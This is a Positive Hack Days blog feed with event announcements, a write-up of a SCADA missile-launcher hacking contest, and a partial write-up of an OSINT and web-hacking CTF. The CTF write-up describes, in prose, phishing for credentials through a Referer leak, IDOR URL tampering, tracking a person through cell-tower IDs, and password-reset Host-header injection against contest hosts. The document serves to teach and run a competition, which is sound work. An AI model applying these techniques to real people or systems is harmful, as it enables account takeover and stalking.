tag:blogger.com,1999:blog-51767717947895026092021-10-06T00:20:52.525+03:00Positive Hack DaysThe Positive Hack Days — international forum on practical information security.Unknownnoreply@blogger.comBlogger165125tag:blogger.com,1999:blog-5176771794789502609.post-4907529176357088182016-02-17T13:59:00.000+03:002016-02-17T13:59:09.716+03:00Introducing PHDays VI Reports: How to Hack a Fare Card, Set Up a Honeypot, and Sell Vulnerabilities<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1CG8NX3WOkc/VsQX5hLxQfI/AAAAAAAAFmM/9DvoiqqTu6k/s1600/86249db050f3ad31fff08baa8c0d104a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://4.bp.blogspot.com/-1CG8NX3WOkc/VsQX5hLxQfI/AAAAAAAAFmM/9DvoiqqTu6k/s640/86249db050f3ad31fff08baa8c0d104a.jpg" width="640" /></a></div><br />On January 31, the first wave of applications to join Positive Hack Days was completed. The forum on information security will take place on May 17 and 18, 2016, at the Moscow World Trade Center. If you want to take part in the forum, you can apply in the near future: the second wave of <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> will hit on February 17 and will last till March 31.<br /><br />For now, we will announce the first participants enrolled in the Tech program. PHDays attendees will learn how to snatch a large sum at Microsoft and test transport systems security with a smartphone, and know the ins and outs of the zero-day vulnerability market.<br /><a name='more'></a><br /><b><span style="font-size: large;">Honeypot</span></b><br /><br />Terrence Gareau, a recognized expert in DDoS attack mitigation, prevention, and recovery, will make his debut at PHDays. He will outline how to develop a honeypot network and produce a data feed that can be used to protect online assets with Kibana, Elasticsearch, Logstash, and AMQP. Terrence Gareau will open-source a monitoring system (a project his team has been developing for the last two years) for reflective DDoS statistics that are external to any specific network.<br /><br /><b><span style="font-size: large;">Reward chasers, or Who is who in the exploit market</span></b><br />Alfonso De Gregorio, the founder of BeeWise and a principal security researcher at secYOUre, will speak at the international forum for the second time. He will continue the topic of the <a href="https://www.youtube.com/watch?v=I7nIyV-zBNY&list=PLEl1NAXHTFNzlKjae0e_-lIktpPeTRR7e&index=37">previous talk</a>, exploit selling. Alfonso will speak about the vulnerability supply chain's participants, zero-day exploits brokers, and ethical questions that arise in the business.<br /><br /><b><span style="font-size: large;">How to make a lifelong travel card</span></b><br /><br />Matteo Beccaro, an Italian security researcher, will talk about transportation security, frauds, and technological failures. The speaker will cover some severe vulnerabilities in real-world transportation systems based on NFC technologies and introduce an open-source application designed to pentest such systems via a smartphone. The talk will attract both professional and amateur pentesters.<br /><br /><b><span style="font-size: large;">Web application security with JavaScript</span></b><br /><br />Client-side JavaScript injection may be used to detect and prevent various attacks, search for vulnerable client components, detect leakage of data about web app infrastructure, and find web bots and malicious tools. The Positive Technologies experts Denis Kolegov and Arseny Reutov will show how to ensure application security with JavaScript share their own injection detection methods that employ syntax analyzers without signatures or filtering regular expressions. They will also discuss implementation of client-side JS honeypot to capture SSRF, IDOR, command injection, and CSRF attacks.<br /><br /><b><span style="font-size: large;">How to snatch a large sum at Microsoft </span></b><br /><br />Until recently, Microsoft refused to launch a bug bounty program despite the fact that it has become a customary practice for competitors. Now, however, Microsoft pays researchers for certain types of vulnerabilities from USD 100 up to USD 100,000. Several recent exciting changes to the Microsoft Bounty Program include the competitive aspect of listing out its Top 100 finders.<br /><br />Jason Shirk, the principal security strategist for MSRC, will explain how the MSRC works with researchers, what bounties are available, and what other rewards can be earned. He will also uncover some secrets behind big bounties that have been paid.<br /><br />The complete list of reports will be available on the PHDays official site in April. To participate for free, you can <a href="http://www.phdays.com/call_for_papers/">present your report</a> on information security or to take part in one of the forum's hacking contests or in the cyberpunk short-story competition. You can also buy a ticket to get to PHDays. Starting from February 15, the price for the full 2-day conference registration will be 9,600 rubles and 7,337 rubles for one day. On March 1, the cost will go up to 14,400 and 9,600 rubles respectively.</div>Unknownnoreply@blogger.com628tag:blogger.com,1999:blog-5176771794789502609.post-24222267817692359762015-12-18T17:01:00.002+03:002015-12-18T17:01:35.080+03:00Tickets For PHDays VI Are Now Available<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4AxWi6dFLPI/VnQRft3OSTI/AAAAAAAAFkQ/d5Mh4xI02k4/s1600/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://1.bp.blogspot.com/-4AxWi6dFLPI/VnQRft3OSTI/AAAAAAAAFkQ/d5Mh4xI02k4/s640/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" width="640" /></a></div><br />Tickets for the international forum on information security Positive Hack Days VI are available for purchase from December 17. We are keeping last year’s prices till mid-January. A two-day ticket costs 7,337 rubles before January 30.<br /><br />You can register and buy ticket on the RUNET-ID <a href="http://runet-id.com/event/phdays16/">Registration</a> page. From January 31, the price will raise: a ticket for two days will cost 9,600 rubles, and 7,337 rubles for a one-day pass.<br /><br />From March 1, the cost will raise to 14,400 for two days and 9,600 rubles per day.<br /><a name='more'></a><br /><b><span style="font-size: large;">Other ways to participate in PHDays</span></b><br /><br />There are <a href="http://www.phdays.com/how_to_join/">several other ways</a> to join PHDays VI. You can present a report on information security. The first stage of <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> lasts till January 30. The review board considers applications not only from acknowledged information security experts, but also from newcomers. Before you apply, please, consider the <a href="http://www.phdays.com/call_for_papers/">forum's concept, topics</a>, and <a href="https://www.youtube.com/playlist?list=PLEl1NAXHTFNzlKjae0e_-lIktpPeTRR7e">previous presentations</a>.<br /><br />You can also get an invitation by proving yourself in one of the <a href="http://2015.phdays.com/program/contests/">hacking contests</a>. Moreover, anyone can organize his own PHDays forum in his town: check out PHDays Everywhere <a href="http://www.phdays.com/registration/everywhere/">registration terms</a>.<br /><br />4,000 hackers, information security specialists, IT vendors, researchers, government representatives and internet privacy defenders are expected to gather at PHDays VI on May 17 and 18, 2016. The event will take place at the Moscow World Trade Center (Krasnopresnenskaya naberezhnaya, 12).<br /><br />Buy tickets at: <a href="http://runet-id.com/event/phdays16">runet-id.com/event/phdays16</a>.<br /><br />More information about PHDays IV: <a href="http://phdays.com/">phdays.com</a></div>Unknownnoreply@blogger.com489tag:blogger.com,1999:blog-5176771794789502609.post-3968498412448826442015-12-03T16:14:00.000+03:002015-12-04T16:15:21.606+03:00Speak About Your Cyberwar at PHDays VI <div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days VI, the international forum on practical information security, opens <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> on December 3, 2015. Our international <a href="http://www.phdays.com/program/review-board/">program committee</a> consisting of very competent and experienced experts will consider every application, whether from a novice or a recognized expert in information security, and select the best proposals.<br /><br /><a href="http://3.bp.blogspot.com/-aJNPBot25N0/VmGRlvsk5mI/AAAAAAAAFis/S3oTWFF3g8Y/s1600/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-aJNPBot25N0/VmGRlvsk5mI/AAAAAAAAFis/S3oTWFF3g8Y/s640/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" width="640" /></a><br /><br />Now, more than ever before, cybersecurity specialists are being asked to stop sitting on the fence and choose a side — competitive intelligence vs DLP systems; security system developers vs targeted cyberattacks; cryptographers vs reverse engineers; hackers vs security operations centers. A <a href="http://www.phdays.com/press/news/43550/">new concept</a> of PHDays VI is designed to show what the current vibe is in information security.<br /><a name='more'></a><br />We want researchers to speak about the real dangerous threats and possible consequences. We also expect developers and integrators to give real answers to these threats rather than to talk about empowering security technologies. Come and share your experience at PHDays VI in Moscow, May 17 and 18, 2016.<br /><div class="separator" style="clear: both; text-align: center;"><br /></div>Your topic can revolve around any modern infosec field: new targeted attacks against SCADA, new threats to medical equipment, vulnerabilities of online government services, unusual techniques to protect mobile apps, antisocial engineering in social networks, or what psychological constitution SOC experts have. In addition, this year, we are planning to discuss IS software design, development tools, and SSDL principles.<br /><br />Our key criteria is that your research should be unique and offer a fresh perspective on hacking, modern information technologies, and the role they play in our lives.<br />If you have something interesting or surprising to share, but none of the formats are suitable for your participation, please apply anyway and be sure we will consider your work.<br /><br />The first stage of CFP ends on January 31, 2016. Apply now — the number of final reports is limited.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cVaht5hKaL0/VmGRrA07fdI/AAAAAAAAFi0/ZlqzlAnmDvQ/s1600/86249db050f3ad31fff08baa8c0d104a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://1.bp.blogspot.com/-cVaht5hKaL0/VmGRrA07fdI/AAAAAAAAFi0/ZlqzlAnmDvQ/s640/86249db050f3ad31fff08baa8c0d104a.jpg" width="640" /></a></div><br />In 2015, the forum brought together 3,500 participants. In 2016, it is expected to see 4,000 attendees: information security leaders, CIO and CISO of the world's largest companies, top managers of giant banks, industrial and oil and gas producing enterprises, telecoms, and IT vendors, representatives from different government departments.<br /><br />Positive Hack Days featured a variety of distinguished participants including Bruce Schneier (the legendary cryptography expert), Whitfield Diffie (one of the inventors of asymmetric cryptography), Mohd Noor Amin (IMPACT, UN), Natalya Kasperskaya (CEO of InfoWatch), Travis Goodspeed (a reverse engineer and wireless enthusiast from the U.S.), Tao Wan (the founder of China Eagle Union), Nick Galbreath (Vice-President of IPONWEB), Mushtaq Ahmed (Emirates Airline), Marc Heuse (the developer of Hydra, Amap, and THC-IPV6), Karsten Nohl (a specialist in GSM engineering), Donato Ferrante and Luigi Auriemma (famous SCADA experts from Italy), and Alexander Peslyak (the creator of the password cracking tool John the Ripper).<br /><br />Find any details about the format, participation rules, and CFP instructions on the PHDays website: <a href="http://www.phdays.com/call_for_papers/">http://www.phdays.com/call_for_papers/</a><br /><div><br /></div></div>Unknownnoreply@blogger.com436tag:blogger.com,1999:blog-5176771794789502609.post-40391804483629694002015-07-09T15:43:00.000+03:002015-07-09T15:43:19.619+03:00Hot Cyberwar. Hackers and Missile Launchers<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tfudsLv4gPs/VZ5q0UuiqGI/AAAAAAAAFUY/Mf70WoI6lKQ/s1600/d671aa5e313d4143a5e26ded2abd2b55.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="http://4.bp.blogspot.com/-tfudsLv4gPs/VZ5q0UuiqGI/AAAAAAAAFUY/Mf70WoI6lKQ/s640/d671aa5e313d4143a5e26ded2abd2b55.jpg" width="640" /></a></div><br />The most spectacular contest during PHDays V was the one organized by Advantech. The contest's participants must gain control over an industrial system that controlled a missile launcher and to hit a certain secret object.<br /><a name='more'></a><br /><b><span style="font-size: large;">General</span></b><br /><br />A missile launcher on a turret rotating about two axes, and a target were presented on a stand. The contest's participants must gain control over the industrial system, turn the missile to the target and hit it (breaking down the equipment wouldn't count).<br /><br />According to the contest's scenario, a hacker bypassed the external perimeter and had access to the office's network segment. Those who connected to the network received the operator's login and password and could watch the system in operation. IP addresses of all the set devices were listed in a table on the stand.<br /><br />This year's format combined various competitions and capture the flag contests (for more information see <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html">our blog</a>). About 40 PHDays attendees and several CTF teams took part in the contest.<br /><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />The SCADA system was deployed on the panel PC Advantech TPC-1840WP and was running on Windows 7 Ultimate without any additional protection systems.<br /><br />The operating system's updates were installed, Windows firewall was up. The SCADA system was implemented on Advantech WebAccess 8.0.<br /><br />Since the software could contain unpatched vulnerabilities, the operator's access was limited to visualization of the processes that go on in the controller. The controller's tags were read-only, and rewriting them didn't affect the equipment's operation. With administrator privileges, the attacker could access the page containing description of the system's structure and intrinsic addressing.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-u13pYFfQWps/VZ5rQlC8GgI/AAAAAAAAFUg/_L6njkFRttQ/s1600/2d691879400843049b7c83efa5106d60.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://4.bp.blogspot.com/-u13pYFfQWps/VZ5rQlC8GgI/AAAAAAAAFUg/_L6njkFRttQ/s640/2d691879400843049b7c83efa5106d60.JPG" width="640" /></a></div><br />Interconnection between the SCADA system and the PLC was maintained via Modbus TCP with the use of pseudoregisters (reading not from I/O modules, but from the controller's program memory ).<br /><br />In standard mode, client and administrator web access to the SCADA system is available via Internet Explorer through HTML4 using IIS, which is part of a standard Windows distribution kit. By default, authentication is performed by the SCADA system itself.<br /><br />The physical connection between the SCADA system and the PLC was provided by the L2 managed switch Advantech EKI-7659C with the use of common Fast Ethernet. The connection for contestants was performed through the same switch, via the wire through EKI-4654R or via Wi-Fi through EKI-6351. The switch was not used for VLAN or as a filter for MAC addresses, though it could be used in that way. In addition, the laptop used for managing the stand was connected to the subnetwork.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rar0_3rrYdM/VZ5ralMnz1I/AAAAAAAAFUo/cdew4-JYSBI/s1600/698e2a4b296b40e4b99f1c39ff0d5017.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://2.bp.blogspot.com/-rar0_3rrYdM/VZ5ralMnz1I/AAAAAAAAFUo/cdew4-JYSBI/s640/698e2a4b296b40e4b99f1c39ff0d5017.JPG" width="640" /></a></div><br />PLC functions were implemented via the PAC controller Advantech APAX-5620KW, a device based on an ARM processor under WinCE 5. The controller turned the missile launcher due to the timer (for our purpose: it controlled the technological program of the process). For this purpose, the softlogic kernel ProConOs (written by KW Software) was used as a task at the kernel level. The movement program was implemented by the developer in ladder logic by using KW Multiprog. The cycle was 50 msec.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WpEPHQMLfl8/VZ5rjNBm12I/AAAAAAAAFUw/wWi9pP2yKDs/s1600/c90e0d7bc41a4f66b69f176dba50c258.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-WpEPHQMLfl8/VZ5rjNBm12I/AAAAAAAAFUw/wWi9pP2yKDs/s640/c90e0d7bc41a4f66b69f176dba50c258.jpg" width="640" /></a></div><br />The controller had three standard connection methods: via VGA and USB (unavailable for contestants); via remote desktop (password-protected); via a development system in IEC 61131: it allowed controlling the softlogic subsystem and debug it.<br /><br />The controller supported two LAN ports, one of which was connected to the SCADA system (the office subnetwork); and the other one, to the input/output modules (the field subnetwork). Network ports had addresses in different subnetworks. This solved the problem of load balancing and separation of access.<br /><br />For input/output, ADAM-6050 modules (for discrete input from the axes final position sensor) and ADAM-6260 modules were used (for relay control). These modules have the ability of distributed programming in GCL, due to which emergency protection was provided. In particular, when riding into a fin, the DI module reports it to the DO module, and the DO module reversed the appropriate motor for 3 sec. Watchdog that disabled all outputs was installed, in case of communication interruption. The missile actuator control unit's block could be bypassed by recording a logical 1 in a separate internal variable (for which it was necessary to perform a recording function in the Modbus register within the internal subnet).<br /><br />The physical connection between the modules was performed without the use of an external switch, by using the daisy chain technology in ADAM-6260.<br />The launcher's turret was supplied by a separate 5 VDC unit and was equipped with three motors (rotation around the vertical and horizontal axis and rocket launch). A relay circuit was used to reverse rotary engines and as zero-level protection against short-circuit in the power unit. In addition, the rocket launcher was equipped with five ground-pressure final position sensors (left, right, up, down, volley performed).<br /><br />Almost all the components of the system contained non-dictionary (generated) passwords of 8—10 characters that included Latin uppercase and lowercase letters, numbers, punctuation marks.<br /><br /><b><span style="font-size: large;">The battle</span></b><br /><br />The contest lasted for two days during Positive Hack Days.<br /><br /><b>Day 1</b><br /><br />During the first day, contestants mostly examined the external subnet's structure and tried to attack the system via SCADA. The hackers disabled operating system services, including the firewall, managed to foist a new user (without administrator privileges though), restarted the PC twice.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hxJJFgN3Zh8/VZ5ru3plHWI/AAAAAAAAFU4/5IJYPR5RARM/s1600/fa6a139c2e764c7482a5f33f3e1b4eab.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="http://4.bp.blogspot.com/-hxJJFgN3Zh8/VZ5ru3plHWI/AAAAAAAAFU4/5IJYPR5RARM/s640/fa6a139c2e764c7482a5f33f3e1b4eab.jpg" width="640" /></a></div><br />Several participants managed to obtain administrator access to WebAccess by using Windows and SCADA exploits, looked through tag descriptions and had the opportunity to stop the system's kernel. However, the system didn't react to the efforts of rewriting tags; the kernel started automatically via Windows Scheduler. At the end of the day the hackers, exhausted, left an autograph on a page of the system and postponed further efforts till the next morning<br /><br /><b>Day 2</b><br /><br />During the first half of the second day, the contest's participants searched for the source of control signals. One of the participants detected an exploit in WinCE 5, but wasn't able to use it.<br /><br />At 2 p.m. a hint was given: the controller's external segment is read-only and you could try to "pass" the controller.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-heDESuOEuRk/VZ5r36PPD3I/AAAAAAAAFVA/gQHE77-Qvfg/s1600/298deb48e0e84b83b3f36f295eb206bf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-heDESuOEuRk/VZ5r36PPD3I/AAAAAAAAFVA/gQHE77-Qvfg/s640/298deb48e0e84b83b3f36f295eb206bf.jpg" width="640" /></a></div><br />At this point RDot (a CTF team) joined. In an hour and a half the team managed to access the remote desktop APAX-5620, gained the opportunity to "kill" and launch the softlogic task and manipulate network adapters.<br /><br />One of the contestants claimed to have received the opportunity to unidirectional forwarding from LAN1 to LAN2 without receiving return packages. However, Modbus did not allowed using this opportunity for destructive purposes.<br /><br />At 3 p.m. some mechanical problems occurred on the stand. The contestants gained the opportunity to intercept packages between KW Multiprog and the controller (stop and restart of the controller, enabling the debug mode, the use of the force function with respect to controller memory cells). However, the contestants didn't use this information.<br /><br />At 4 p.m. participants were provided with program source codes of the APAX and ADAM modules, which could contribute to discovering ways of exploiting regular programs. RDot was noted for the successful attempt of backward reading the program from the controller (this function in KW Software was not password-protected), turning on the debug mode, and monitoring the controller's registers.<br /><br />At 5 p.m. users were admitted to the internal network; they launched a DDoS attack against the emergency protection system and tried to disable it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--Tzxk19QFA4/VZ5sANTcRII/AAAAAAAAFVI/Bz8q0-mn3Uo/s1600/4652bf103b3c4871a8b4ab76fa0a7207.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://4.bp.blogspot.com/--Tzxk19QFA4/VZ5sANTcRII/AAAAAAAAFVI/Bz8q0-mn3Uo/s640/4652bf103b3c4871a8b4ab76fa0a7207.JPG" width="640" /></a></div><br />The contest ended at 6 p.m. No one managed to stop the GCL program or to gain control over the outputs, although there were signs of impact on the modules' firmware.<br /><br />Prize-winning participants were determined due to the points they gained:<br /><ul style="text-align: left;"><li>1st place: Artur G. from the team Rdot (for hacking the APAX remote desktop, successful work with the source code in IEC61131),</li><li>2nd place: Pavel I. (the first one to gain administrator access to the SCADA system's interface),</li><li>3rd place: Alexander Y. (for sending packages between the APAX controller's ports and for applied efforts).</li></ul>Consolation prize: Alexey P. (for using social engineering methods: detecting SCADA project backup from the administrator's laptop and obtaining the administrator password).<br /><br />The contest's organizers concluded that:<br /><ul style="text-align: left;"><li>Most intruders do not know much about ICS specifics. Participants mainly performed attacks (against ports) or used methods that did not comply with the system's features (monitoring Modbus traffic via Wireshark). However, it is possible to study the system's structure and its standard operation.</li><li>The most vulnerable are those components that are the closest to the operator interface: SCADA client input, remote desktops. For systems based on Windows, additional software is required to protect both computers (firewalls) and communication channels (encryption).</li><li>An enterprise bus and fieldbus must be physically isolated from each other at least by a device with two network cards. Using VLAN is not always effective because of vulnerabilities in web interfaces pf switches.</li></ul></div>Unknownnoreply@blogger.com946tag:blogger.com,1999:blog-5176771794789502609.post-59025809506919746082015-07-08T16:44:00.000+03:002015-07-08T16:44:12.630+03:00Writeup: Competitive Intelligence Contest at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Dz91_74OAmk/VZ0e2dag5wI/AAAAAAAAFPI/NPL7lQ0659c/s1600/400f04920bb4fdfe707cd237ff6912df.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Dz91_74OAmk/VZ0e2dag5wI/AAAAAAAAFPI/NPL7lQ0659c/s1600/400f04920bb4fdfe707cd237ff6912df.png" /></a></div>This year among the participants of Competitive Intelligence were not only the contest’s usual fans but also CTF teams, so we adjusted difficulty levels accordingly. In addition, we allowed team play on one condition: a person couldn’t participate both individually and as part of a CTF team. That is why we reached a mutual agreement to disqualify the player who scored most — <b>azrael</b>.<br /><br />All the contests were revolving around the fictional state — United States of Soviet Unions. The Competitive Intelligence participants had to look for info about company employees with the USSU citizenship. Meantime the players were free to answer five various questions regarding five different organizations. Within one block, you could open new questions after answering the previous ones. (<i>One team even managed to find the right answer using a brute force method, but failed to advance after that – they just didn’t have enough info.</i>)<br /><a name='more'></a><br /><b><span style="font-size: large;">1. Find out dinner location of Bank of Snatch (snatch-bank.phdays.com)’s Chairman/Get any info you can on him.</span></b><br /><br /><i>You had to find all the info available about the Chairman of Bank of Snatch.</i><br /><br /><b>1.1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Get his email address.</b><br />It’s quite easy in the beginning, actually — just get the Chairman’s email. Google already did that for you — it cashed several pages of snatch-bank.phdays.com, including the one with financial documentation.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cBT9cl-6LRg/VZ0ffo34_9I/AAAAAAAAFPQ/jSsbDI_Hydw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-cBT9cl-6LRg/VZ0ffo34_9I/AAAAAAAAFPQ/jSsbDI_Hydw/s640/1.png" width="578" /></a></div><br />The document’s metatags distinctly show that the user Aldora Jacinta Artino has the email <a href="mailto:a_j.artino.bank@ussu-gov.org">a_j.artino.bank@ussu-gov.org</a>, which means that the Chairman, which goes under the name of Zenon Pavlos Economides, should have an email like this: <a href="mailto:z_p.economides.bank@ussu-gov.org">z_p.economides.bank@ussu-gov.org</a>.<br /><br /><u>Correct answers: 47</u><br /><u><br /></u><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-InSu4i1xDhM/VZ0fqTHwmHI/AAAAAAAAFPY/IYvBPforJOI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://1.bp.blogspot.com/-InSu4i1xDhM/VZ0fqTHwmHI/AAAAAAAAFPY/IYvBPforJOI/s320/2.png" width="320" /></a></div><u><br /></u><br /><b>1.2.<span class="Apple-tab-span" style="white-space: pre;"> </span>What is his domain account? (format: user:password)</b><br />Let’s make it a bit more challenging. This time you need to find the domain account — name and password. For our return players the task proves to be quite easy. If you send an email to the previously acquired address, you may find a not so subtle hint that the guy read it, which means it’s high time to try and get him click on the link you want.<br /><br />Note: Chairman’s browser blocked non-standard ports for web traffic like 1337. So just stick to 80 or 8080.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RhM3OUyoD9c/VZ0fuSJMzJI/AAAAAAAAFPg/EPBXXepRFik/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="http://1.bp.blogspot.com/-RhM3OUyoD9c/VZ0fuSJMzJI/AAAAAAAAFPg/EPBXXepRFik/s400/3.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iozLCevisHM/VZ0gaHFm1VI/AAAAAAAAFPw/Kuud6ltd25c/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="http://1.bp.blogspot.com/-iozLCevisHM/VZ0gaHFm1VI/AAAAAAAAFPw/Kuud6ltd25c/s400/4.png" width="400" /></a></div><br /> <br />After capturing the query, you will see that the email server included in the message the Referer header, which can be used to retrieve the account name and password: zenontrapeza:zenon123.<br /><br /><u>Correct answers: 17</u><br /><br /><b>1.3.<span class="Apple-tab-span" style="white-space: pre;"> </span> Finally, find out the dinner place.</b><br />As the title says. At the moment we have his alias – zenontrapeza. Let’s ask Google again. You are literally two clicks away from discovering the Chairman’s account of FB, which will give you another lead: our man loves to use a certain tracker.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n5fRWqnXaXI/VZ0ghr7jQ2I/AAAAAAAAFP0/PFuf5UeDQ7k/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/-n5fRWqnXaXI/VZ0ghr7jQ2I/AAAAAAAAFP0/PFuf5UeDQ7k/s400/5.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>But something seems off. After performing some unsophisticated manipulations with URL and ID, you should be able to gain access to the Pavlos track file:<br /><br /><ul style="text-align: left;"><li><a href="http://sport.phdays.com/account/1045/">http://sport.phdays.com/account/1045/</a></li><li><a href="http://sport.phdays.com/achive/1045">http://sport.phdays.com/achive/1045</a></li><li><a href="http://sport.phdays.com/img/1045">http://sport.phdays.com/img/1045</a></li><li><a href="http://sport.phdays.com/img/1">http://sport.phdays.com/img/1</a>, which gave an error you could use to find the final URL —<a href="http://sport.phdays.com/kmls/track.kml?id=1045">http://sport.phdays.com/kmls/track.kml?id=1045</a></li></ul><br />Finally, we got the track we need. But here is a tough one for you – there are no GPS coordinates in it, just the mobile phone operator’s base station ID. No problem. There is an amazing site called opencellid.org, which allows finding base station coordinates around the world.<br /><br />Having obtained the coordinates, you just need to define the lunch break time (exclude Sunday) and find the restaurant’s name via the good ol’ opencellid — <b>Boston Seafood&Bar</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5tVGDTv8hxs/VZ0gwxCjURI/AAAAAAAAFP8/lnciSAoVwZs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-5tVGDTv8hxs/VZ0gwxCjURI/AAAAAAAAFP8/lnciSAoVwZs/s320/6.png" width="284" /></a></div><br /><u>Correct answers: 12</u><br /><br /><b><span style="font-size: large;">2. Get intel on MiTM Mobile (mitm-mobile.phdays.com)’s marketing director.</span></b><br /><br /><i>You are required to collect info on the marketing director of MiTM Mobile.</i><br /><br /><b>2.1. We have network capture from the director's laptop (<a href="https://mega.co.nz/#!34IEGYZa!Xowwo-UFTWMIfqfmiSPQXMWY0F7mySb-WtIxB3SVXWQ">https://mega.co.nz/#!34IEGYZa!Xowwo-UFTWMIfqfmiSPQXMWY0F7mySb-WtIxB3SVXWQ</a> ). Can you find out where he received medical treatment?</b><br />So where did he get medical help? Traffic dump allows you to find not only the domain login name of one of the Positive Technologies employees, but also the query to the USSU search engine.<br /><br />Judging from the banner and the Cookies parameters at http://ussu.phdays.com/search.php, the search engine uses the utmz tokens, just like Google. If you insert this data into the query to search.php, the context ad for a hospital pops up. Your next step is to look for a matching image, disregarding all the rest or even easier — just perform a search with the contacts from the picture. The correct answer is <b>Rayville Recovery</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tn7DwZhzJAU/VZ0hQmyDZ1I/AAAAAAAAFQI/QOrE9c2chqk/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="http://1.bp.blogspot.com/-tn7DwZhzJAU/VZ0hQmyDZ1I/AAAAAAAAFQI/QOrE9c2chqk/s400/7.png" width="400" /></a></div><br /><br /><u>Correct answers: 13</u><br /><br /><b>2.2. Ok, now we know his email account. It is l_u.imbesi@ussu-gov.org - we need access (give us the email password).</b><br />Robots.txt files are often a hidden treasure of vulnerable scripts that should be kept safe from hackers, not search engines. This time is no different. There is a link to a bugged script for password recovery from the email restore.php. If you call a password reset in the debug mode — debug=On, you may discover that emails are sent via port 25 of the server. The server name can be found directly in the <b>Host header</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--C45d_T5UVQ/VZ0ha_p8sqI/AAAAAAAAFQQ/ZZ_QCdb24ss/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://2.bp.blogspot.com/--C45d_T5UVQ/VZ0ha_p8sqI/AAAAAAAAFQQ/ZZ_QCdb24ss/s400/8.png" width="400" /></a></div>This means that if you use netcat on port 25 and send a query with the Host header containing your IP address and domain name, port 25 will get an email indicating the current password (<b>AQwr34%!9R^</b>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N1zWMCH0r1M/VZ0hjEaSdXI/AAAAAAAAFQY/3DSUY-3rAoE/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-N1zWMCH0r1M/VZ0hjEaSdXI/AAAAAAAAFQY/3DSUY-3rAoE/s640/9.png" width="640" /></a></div><br /><i>Bonus</i>: There was also a possibility to search the email box and find some insider info in draft emails about text messages getting cheaper at 10:30 a.m, which means that around this time the MiTM Mobile stocks will be going up.<br /><br /><u>Correct answers: 4</u><br /><br /><div 